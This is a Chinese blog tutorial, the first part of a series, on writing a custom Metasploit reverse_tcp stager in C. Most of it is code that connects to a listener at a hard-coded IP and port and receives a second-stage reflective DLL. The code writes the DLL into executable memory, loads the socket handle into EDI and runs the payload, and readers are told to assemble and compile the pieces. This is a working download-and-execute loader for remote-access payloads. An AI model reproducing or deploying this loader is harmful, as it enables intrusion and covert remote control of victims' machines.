msf stagers开发不完全指北(一)
采用c开发stagers
前言
之前有写过一篇 metasploit payload运行原理浅析(sockedi调用约定是什么),里面有提到以后了解这些东西后可以做的事情,其实包括但不限于自写stagers,扩展C2 实现。本系列将从之前这篇文章中获取到的原理性知识进行实践,一步步记录我在这个过程中踩到的坑与收获,这个系列可能会更新得比较慢,也可能会不定期鸽,希望大家能够一同学习,有什么错误的地方也欢迎大家来探讨指正。
前情提要
上面我们给出的文章讲到关于第一阶段与第二阶段的交互原理
简要概括一下,对于 reverse_tcp 的payload 来说,所给出的 payload 是第一阶段 (stagers),然后它会发起 socket tcp 连接请求向远端请求第二阶段 (stages) ,这个阶段是一个反射 dll,然后把 socket fd (socket文件描述符) 放入 edi 寄存器,开始从起始地址执行第二阶段,第二阶段后续的操作会用到这个 socket fd,所以一开始需要传入,后面的关于这个 dll 具体运作以及为什么能直接从起始地址开始跑我们暂时不需要关心,这个在我上一篇文章中已有提及。
明确思路
上面的流程说的已经比较明白了(此篇文章里我将采用 metasploit-loader 作为代码讲解):
-
向 msf 监听地址发起 tcp 请求
-
获取 stages
-
将 socket fd 放入寄存器 edi
-
从起始地址开始执行 stages
发起tcp请求stages
先贴代码
首先我们需要创建一个socket连接
/* 错误处理 */
void punt(SOCKET my_socket, char * error) {
printf("Bad things: %s\n", error);
closesocket(my_socket);
WSACleanup();
exit(1);
}
...
WSADATA wsaData;
WORD wVersionRequested;
wVersionRequested = MAKEWORD(2, 2);
if (WSAStartup(wVersionRequested, &wsaData) < 0) {
printf("ws2_32.dll is out of date.\n");
WSACleanup();
exit(1);
}
struct hostent * target;
struct sockaddr_in sock;
SOCKET my_socket;
char* targetip = "192.168.174.136"
int port = 4444
/* 创建socket */
my_socket = socket(AF_INET, SOCK_STREAM, 0);
if (my_socket == INVALID_SOCKET)
punt(my_socket, "Could not initialize socket");
/* 解析targetip*/
target = gethostbyname(targetip);
if (target == NULL)
punt(my_socket, "Could not resolve target");
/* 准备tcp连接相关信息 */
memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
/* 连接 */
if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )
punt(my_socket, "Could not connect to target");
这部分代码就是和我们的 msf 监听地址建立 socket 连接
接下来关于stages有点需要说明的。
stages结构:
- 开头 4byte 是后续的 tcp 包长度
- 4byte 后紧跟的是一个 dll,也就是一个pe文件
那么我们按照这个方式去读
int count = recv(my_socket, (char *)&size, 4, 0);
if (count != 4 || size <= 0)
punt(my_socket, "read a strange or incomplete length value\n");
读出后面的 dll 数据包长度
然后我们开始读取 dll
/* 接收指定长度的数据 */
int recv_all(SOCKET my_socket, void * buffer, int len) {
int tret = 0;
int nret = 0;
void * startb = buffer;
while (tret < len) {
nret = recv(my_socket, (char *)startb, len - tret, 0);
startb += nret;
tret += nret;
if (nret == SOCKET_ERROR)
punt(my_socket, "Could not receive data");
}
return tret;
}
buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (buffer == NULL)
punt(my_socket, "could not allocate buffer\n");
/* 把 socket fd 放入 edi 寄存器,注意这里的 socket 句柄需要取到句柄指向的那个数据,而不是句柄指针
BF 78 56 34 12 => mov edi, 0x12345678 */
buffer[0] = 0xBF;
/* 构造上面的机器码 */
memcpy(buffer + 1, &my_socket, 4);
/* 把读取出来的数据放到 buffer 后面 */
count = recv_all(my_socket, buffer + 5, size);
这里需要注意的地方是把 socket fd 放入 edi,这个过程是比较重要的,具体的原理我在上一篇文章有提到。
执行stages
现在我们只需要像之前执行 shellcode 那样执行即可
/* 把buffer强转为一个函数去调用 */
function = (void (*)())buffer;
function();
然后把这些代码组合起来进行编译
编译
编译需要注意的点是:payload必须对应
比如32位的payload必须编译为32位的,相应的64位必须编译为64位